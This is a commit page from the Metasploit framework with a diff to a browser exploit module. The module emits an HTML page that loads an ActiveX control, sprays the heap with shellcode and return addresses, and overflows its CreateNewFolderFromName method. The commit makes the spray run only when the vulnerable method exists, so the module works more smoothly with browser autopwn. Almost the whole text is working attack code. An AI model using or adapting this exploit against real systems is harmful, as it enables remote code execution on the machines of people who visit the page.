play a little nicer with browser autopwn by not spraying the heap if creating the vulnerable object failed
git-svn-id: file:///home/svn/framework3/trunk@12667 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
3fedad5715
commit
36983436db
|
@ -92,11 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
rand6 = rand_text_alpha(rand(100) + 1)
|
rand6 = rand_text_alpha(rand(100) + 1)
|
||||||
rand7 = rand_text_alpha(rand(100) + 1)
|
rand7 = rand_text_alpha(rand(100) + 1)
|
||||||
rand8 = rand_text_alpha(rand(100) + 1)
|
rand8 = rand_text_alpha(rand(100) + 1)
|
||||||
|
boom = rand_text_alpha(rand(100) + 1)
|
||||||
|
|
||||||
content = %Q|
|
content = %Q|
|
||||||
<html>
|
<html>
|
||||||
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
|
<object id='#{vname}' classid='clsid:A09AE68F-B14D-43ED-B713-BA413F034904'></object>
|
||||||
<script language="JavaScript">
|
<script language="JavaScript">
|
||||||
|
function #{boom}() {
|
||||||
var #{rand1} = unescape('#{shellcode}');
|
var #{rand1} = unescape('#{shellcode}');
|
||||||
var #{rand2} = unescape('#{ret}');
|
var #{rand2} = unescape('#{ret}');
|
||||||
var #{rand3} = 20;
|
var #{rand3} = 20;
|
||||||
|
@ -110,6 +112,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
var #{rand8} = "A";
|
var #{rand8} = "A";
|
||||||
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
|
for (#{var_i} = 0; #{var_i} < 1024; #{var_i}++) { #{rand8} = #{rand8} + #{rand2} }
|
||||||
#{vname}.CreateNewFolderFromName(#{rand8});
|
#{vname}.CreateNewFolderFromName(#{rand8});
|
||||||
|
}
|
||||||
|
if ((typeof #{vname}.CreateNewFolderFromName) != "undefined") {
|
||||||
|
#{boom}();
|
||||||
|
}
|
||||||
</script>
|
</script>
|
||||||
</html>
|
</html>
|
||||||
|
|
|
|
||||||
|
|
Loading…
Reference in New Issue